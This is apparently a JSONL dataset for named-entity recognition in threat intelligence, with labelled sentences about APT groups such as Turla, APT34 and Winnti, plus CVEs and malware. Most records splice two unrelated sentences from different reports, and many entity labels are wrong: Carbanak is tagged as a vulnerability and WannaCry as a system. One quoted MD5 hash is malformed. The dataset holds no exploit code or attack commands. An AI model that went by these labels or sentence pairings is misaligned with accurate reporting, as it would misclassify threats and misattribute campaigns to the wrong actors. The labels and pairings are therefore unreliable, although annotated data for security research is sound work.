{"text": "To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer .", "spans": [{"start": 71, "end": 79, "label": "Vulnerability"}, {"start": 174, "end": 184, "label": "System"}, {"start": 189, "end": 200, "label": "System"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 276, "end": 283, "label": "Malware"}, {"start": 292, "end": 298, "label": "Malware"}, {"start": 302, "end": 307, "label": "Malware"}]}
{"text": "Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . Kaspersky Lab documented this behavior in 2014 .", "spans": [{"start": 28, "end": 36, "label": "Vulnerability"}, {"start": 70, "end": 75, "label": "Organization"}, {"start": 193, "end": 206, "label": "Organization"}]}
{"text": "These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors .", "spans": [{"start": 28, "end": 43, "label": "Organization"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 148, "end": 156, "label": "Vulnerability"}, {"start": 174, "end": 195, "label": "Organization"}, {"start": 208, "end": 221, "label": "Organization"}, {"start": 251, "end": 256, "label": "Organization"}, {"start": 268, "end": 289, "label": "Malware"}]}
{"text": "The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack .", "spans": [{"start": 18, "end": 28, "label": "Organization"}, {"start": 40, "end": 48, "label": "Vulnerability"}, {"start": 97, "end": 119, "label": "Organization"}, {"start": 243, "end": 248, "label": "Organization"}]}
{"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito .", "spans": [{"start": 17, "end": 32, "label": "Organization"}, {"start": 58, "end": 63, "label": "Organization"}, {"start": 66, "end": 75, "label": "Organization"}, {"start": 88, "end": 110, "label": "Organization"}, {"start": 160, "end": 168, "label": "Vulnerability"}, {"start": 173, "end": 179, "label": "System"}]}
{"text": "Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . It is not the first time Turla has used generic tools .", "spans": [{"start": 31, "end": 42, "label": "Organization"}, {"start": 47, "end": 57, "label": "System"}, {"start": 180, "end": 188, "label": "System"}, {"start": 255, "end": 261, "label": "System"}, {"start": 266, "end": 276, "label": "System"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 354, "end": 367, "label": "Malware"}]}
{"text": "Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . In the past , we have seen the group using open-source password dumpers such as Mimikatz .", "spans": [{"start": 75, "end": 83, "label": "Vulnerability"}, {"start": 88, "end": 107, "label": "Organization"}, {"start": 209, "end": 231, "label": "Organization"}, {"start": 302, "end": 330, "label": "Malware"}, {"start": 339, "end": 347, "label": "Malware"}]}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 270, "end": 280, "label": "Malware"}]}
{"text": "In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": [{"start": 29, "end": 37, "label": "Vulnerability"}, {"start": 68, "end": 89, "label": "Organization"}, {"start": 242, "end": 256, "label": "Indicator"}, {"start": 315, "end": 317, "label": "Indicator"}]}
{"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper .", "spans": [{"start": 64, "end": 88, "label": "Malware"}, {"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 168, "end": 173, "label": "Organization"}, {"start": 183, "end": 193, "label": "Malware"}, {"start": 273, "end": 280, "label": "Malware"}]}
{"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash executable with a trojanized version .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 30, "end": 57, "label": "Vulnerability"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 119, "end": 133, "label": "Malware"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 156, "end": 172, "label": "System"}, {"start": 175, "end": 188, "label": "Vulnerability"}, {"start": 284, "end": 289, "label": "Organization"}]}
{"text": "While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign .", "spans": [{"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 163, "end": 176, "label": "Vulnerability"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 267, "end": 272, "label": "Organization"}]}
{"text": "The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . In this post , we have presented the evolutions of the Turla Mosquito campaign over the last few months .", "spans": [{"start": 39, "end": 52, "label": "Vulnerability"}, {"start": 65, "end": 73, "label": "Organization"}]}
{"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 19, "end": 32, "label": "Vulnerability"}, {"start": 164, "end": 174, "label": "Organization"}, {"start": 177, "end": 186, "label": "Organization"}, {"start": 189, "end": 192, "label": "Organization"}, {"start": 195, "end": 202, "label": "Organization"}, {"start": 205, "end": 215, "label": "Organization"}, {"start": 220, "end": 237, "label": "Organization"}]}
{"text": "WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system . Turla 's campaign still relies on a fake Flash installer but , instead of directly dropping the two malicious DLLs , it executes a Metasploit shellcode and drops , or downloads from Google Drive , a legitimate Flash installer .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 18, "end": 29, "label": "Vulnerability"}, {"start": 51, "end": 54, "label": "System"}, {"start": 123, "end": 128, "label": "Organization"}, {"start": 164, "end": 169, "label": "System"}, {"start": 254, "end": 284, "label": "Malware"}, {"start": 333, "end": 338, "label": "System"}]}
{"text": "WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . The Turla espionage group has been targeting various institutions for many years .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 44, "end": 55, "label": "Vulnerability"}, {"start": 85, "end": 99, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}]}
{"text": "Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . Recently , we found several new versions of Carbon , a second stage backdoor in the Turla group arsenal .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 24, "end": 45, "label": "Vulnerability"}, {"start": 138, "end": 144, "label": "Malware"}, {"start": 178, "end": 183, "label": "Organization"}]}
{"text": "The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon .", "spans": [{"start": 22, "end": 35, "label": "Vulnerability"}, {"start": 79, "end": 93, "label": "Organization"}, {"start": 94, "end": 106, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 291, "end": 297, "label": "Malware"}]}
{"text": "If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 .", "spans": [{"start": 7, "end": 28, "label": "System"}, {"start": 55, "end": 63, "label": "System"}, {"start": 108, "end": 133, "label": "Vulnerability"}, {"start": 136, "end": 185, "label": "Organization"}]}
{"text": "Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 124, "end": 143, "label": "Vulnerability"}, {"start": 157, "end": 166, "label": "Organization"}, {"start": 200, "end": 209, "label": "Malware"}, {"start": 302, "end": 304, "label": "System"}]}
{"text": "The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla \u2013 the White Atlas framework \" from mid-2016 .", "spans": [{"start": 4, "end": 23, "label": "Vulnerability"}, {"start": 137, "end": 142, "label": "System"}, {"start": 145, "end": 153, "label": "System"}, {"start": 169, "end": 178, "label": "Malware"}, {"start": 224, "end": 237, "label": "Malware"}, {"start": 310, "end": 323, "label": "Malware"}, {"start": 330, "end": 341, "label": "Malware"}]}
{"text": "The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 14, "end": 23, "label": "Organization"}, {"start": 28, "end": 39, "label": "Vulnerability"}, {"start": 207, "end": 216, "label": "Malware"}]}
{"text": "Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 35, "end": 44, "label": "Organization"}, {"start": 61, "end": 85, "label": "Vulnerability"}, {"start": 88, "end": 101, "label": "Vulnerability"}, {"start": 222, "end": 231, "label": "Organization"}]}
{"text": "The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 .", "spans": [{"start": 26, "end": 39, "label": "Vulnerability"}, {"start": 169, "end": 198, "label": "Organization"}]}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 90, "end": 99, "label": "Malware"}, {"start": 124, "end": 133, "label": "Organization"}]}
{"text": "The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 59, "end": 72, "label": "Vulnerability"}, {"start": 115, "end": 120, "label": "Organization"}, {"start": 189, "end": 195, "label": "System"}, {"start": 208, "end": 235, "label": "Organization"}]}
{"text": "Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims .", "spans": [{"start": 14, "end": 33, "label": "Organization"}, {"start": 60, "end": 79, "label": "Vulnerability"}, {"start": 195, "end": 200, "label": "System"}, {"start": 225, "end": 230, "label": "Organization"}]}
{"text": "The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 41, "end": 53, "label": "Vulnerability"}, {"start": 56, "end": 83, "label": "Vulnerability"}, {"start": 101, "end": 114, "label": "Vulnerability"}, {"start": 115, "end": 128, "label": "Vulnerability"}, {"start": 175, "end": 188, "label": "System"}, {"start": 215, "end": 224, "label": "Organization"}, {"start": 225, "end": 232, "label": "System"}]}
{"text": "While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . First , Turla steals emails by forwarding all outgoing emails to the attackers .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 67, "end": 80, "label": "Vulnerability"}, {"start": 104, "end": 117, "label": "Organization"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 203, "end": 209, "label": "System"}, {"start": 237, "end": 243, "label": "System"}]}
{"text": "To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability . We identified several European governments and defense companies compromised with this group .", "spans": [{"start": 239, "end": 253, "label": "Vulnerability"}, {"start": 292, "end": 312, "label": "Organization"}, {"start": 317, "end": 334, "label": "Organization"}]}
{"text": "The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 144, "end": 152, "label": "System"}, {"start": 288, "end": 301, "label": "Malware"}]}
{"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines .", "spans": [{"start": 21, "end": 45, "label": "Malware"}, {"start": 74, "end": 138, "label": "Vulnerability"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 210, "end": 215, "label": "Organization"}]}
{"text": "Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . As detailed in the previous section , this malware is able to manipulate and exfiltrate emails .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 180, "end": 186, "label": "System"}]}
{"text": "Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 40, "end": 53, "label": "Vulnerability"}, {"start": 86, "end": 101, "label": "System"}, {"start": 150, "end": 155, "label": "Organization"}, {"start": 238, "end": 244, "label": "System"}, {"start": 273, "end": 288, "label": "Malware"}]}
{"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The attackers first infected in March 2017 .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 65, "end": 78, "label": "Vulnerability"}]}
{"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 39, "end": 69, "label": "Vulnerability"}, {"start": 70, "end": 84, "label": "Vulnerability"}, {"start": 95, "end": 103, "label": "System"}, {"start": 108, "end": 119, "label": "System"}, {"start": 143, "end": 152, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}]}
{"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft.NET Framework that offers actors complete access to compromised systems targeted by its operator .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 96, "end": 115, "label": "Organization"}, {"start": 118, "end": 137, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 225, "end": 247, "label": "Vulnerability"}, {"start": 266, "end": 270, "label": "System"}, {"start": 327, "end": 333, "label": "Malware"}, {"start": 347, "end": 353, "label": "Malware"}]}
{"text": "Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": [{"start": 16, "end": 20, "label": "System"}, {"start": 42, "end": 58, "label": "Vulnerability"}, {"start": 230, "end": 241, "label": "Malware"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 370, "end": 379, "label": "Organization"}, {"start": 382, "end": 401, "label": "Organization"}, {"start": 404, "end": 428, "label": "Organization"}, {"start": 435, "end": 457, "label": "Organization"}]}
{"text": "It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . This is also a full-featured backdoor controlled by email , and which can work independently of any other Turla component .", "spans": [{"start": 27, "end": 40, "label": "System"}, {"start": 43, "end": 56, "label": "Vulnerability"}, {"start": 172, "end": 194, "label": "Malware"}, {"start": 263, "end": 268, "label": "Organization"}]}
{"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 .", "spans": [{"start": 5, "end": 18, "label": "Malware"}, {"start": 68, "end": 81, "label": "Malware"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 353, "end": 359, "label": "Malware"}]}
{"text": "PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . If the hypothesis is correct and the Turla threat group is using Kazuar , we believe they may be using it as a replacement for Carbon and its derivatives .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 15, "end": 24, "label": "Organization"}, {"start": 50, "end": 63, "label": "Vulnerability"}, {"start": 195, "end": 200, "label": "Organization"}, {"start": 223, "end": 229, "label": "Malware"}, {"start": 285, "end": 291, "label": "Malware"}]}
{"text": "PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 15, "end": 24, "label": "Organization"}, {"start": 37, "end": 53, "label": "Vulnerability"}, {"start": 146, "end": 155, "label": "Malware"}, {"start": 158, "end": 174, "label": "Malware"}, {"start": 177, "end": 201, "label": "Malware"}, {"start": 208, "end": 214, "label": "Malware"}]}
{"text": "NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 67, "end": 77, "label": "Organization"}, {"start": 147, "end": 153, "label": "Organization"}]}
{"text": "In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . The subject is a series of targeted attacks against private companies .", "spans": [{"start": 39, "end": 54, "label": "Organization"}, {"start": 57, "end": 67, "label": "Organization"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 140, "end": 155, "label": "Vulnerability"}, {"start": 255, "end": 272, "label": "Organization"}]}
{"text": "The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . e uncovered the activity of a hacking group which has Chinese origins .", "spans": [{"start": 19, "end": 31, "label": "Organization"}, {"start": 60, "end": 70, "label": "Organization"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 116, "end": 157, "label": "Vulnerability"}, {"start": 160, "end": 173, "label": "Vulnerability"}, {"start": 220, "end": 226, "label": "System"}]}
{"text": "The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from .", "spans": [{"start": 17, "end": 26, "label": "Organization"}, {"start": 52, "end": 68, "label": "Vulnerability"}, {"start": 77, "end": 87, "label": "Organization"}, {"start": 187, "end": 192, "label": "Organization"}]}
{"text": "Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry .", "spans": [{"start": 23, "end": 32, "label": "Organization"}, {"start": 52, "end": 66, "label": "Vulnerability"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 141, "end": 171, "label": "Vulnerability"}, {"start": 184, "end": 207, "label": "Organization"}, {"start": 349, "end": 375, "label": "Organization"}]}
{"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, {"start": 68, "end": 81, "label": "Vulnerability"}, {"start": 150, "end": 157, "label": "System"}, {"start": 212, "end": 218, "label": "Organization"}]}
{"text": "In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . The group 's main objective is to steal source codes .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 53, "end": 83, "label": "Vulnerability"}, {"start": 84, "end": 98, "label": "Vulnerability"}, {"start": 109, "end": 117, "label": "System"}, {"start": 122, "end": 133, "label": "System"}]}
{"text": "During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . In 2010 HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers \u2013 an American video game company .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 125, "end": 138, "label": "Vulnerability"}, {"start": 143, "end": 157, "label": "Vulnerability"}, {"start": 213, "end": 219, "label": "Organization"}, {"start": 281, "end": 287, "label": "Malware"}, {"start": 304, "end": 310, "label": "Organization"}, {"start": 329, "end": 356, "label": "Organization"}]}
{"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers \u2013 an American video game company .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 39, "end": 69, "label": "Vulnerability"}, {"start": 70, "end": 84, "label": "Vulnerability"}, {"start": 95, "end": 103, "label": "System"}, {"start": 108, "end": 119, "label": "System"}, {"start": 143, "end": 152, "label": "Organization"}, {"start": 187, "end": 193, "label": "Organization"}, {"start": 255, "end": 261, "label": "Malware"}, {"start": 278, "end": 284, "label": "Organization"}, {"start": 312, "end": 330, "label": "Organization"}]}
{"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 31, "end": 44, "label": "System"}, {"start": 65, "end": 78, "label": "Vulnerability"}, {"start": 101, "end": 113, "label": "Organization"}, {"start": 170, "end": 186, "label": "Organization"}]}
{"text": "Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group .", "spans": [{"start": 87, "end": 144, "label": "Vulnerability"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 229, "end": 236, "label": "Organization"}, {"start": 274, "end": 280, "label": "Malware"}, {"start": 281, "end": 288, "label": "Malware"}]}
{"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . The Axiom group has been presented as an advanced Chinese threat actor carrying out cyber-espionage attacks against a whole range of different industries .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 251, "end": 256, "label": "Organization"}]}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . this library includes two drivers compiled on August 22 and September 4 , 2014 .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}]}
{"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 119, "end": 158, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 283, "end": 309, "label": "Organization"}, {"start": 312, "end": 315, "label": "Organization"}, {"start": 368, "end": 384, "label": "Organization"}]}
{"text": "TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . Conversely , LokiBot and Agent Tesla are new malware tools .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 56, "end": 59, "label": "Organization"}, {"start": 114, "end": 131, "label": "Vulnerability"}, {"start": 170, "end": 177, "label": "Malware"}, {"start": 182, "end": 193, "label": "Malware"}]}
{"text": "TG-3390 actors have used Java exploits in their SWCs . Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 25, "end": 38, "label": "Vulnerability"}, {"start": 48, "end": 52, "label": "System"}, {"start": 120, "end": 127, "label": "Organization"}, {"start": 164, "end": 186, "label": "Malware"}]}
{"text": "In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": [{"start": 16, "end": 23, "label": "Organization"}, {"start": 38, "end": 51, "label": "Vulnerability"}, {"start": 119, "end": 139, "label": "System"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 181, "end": 186, "label": "System"}, {"start": 351, "end": 371, "label": "Organization"}]}
{"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": [{"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 130, "end": 150, "label": "System"}, {"start": 157, "end": 170, "label": "Vulnerability"}, {"start": 192, "end": 197, "label": "System"}, {"start": 362, "end": 382, "label": "Organization"}]}
{"text": "TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage .", "spans": [{"start": 139, "end": 146, "label": "Organization"}, {"start": 242, "end": 249, "label": "Organization"}, {"start": 288, "end": 294, "label": "Organization"}]}
{"text": "Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack . We assess with high confidence that the Winnti umbrella is associated with the Chinese state intelligence apparatus , with at least some elements located in the Xicheng District of Beijing .", "spans": [{"start": 65, "end": 79, "label": "Vulnerability"}, {"start": 82, "end": 114, "label": "System"}, {"start": 281, "end": 287, "label": "Malware"}]}
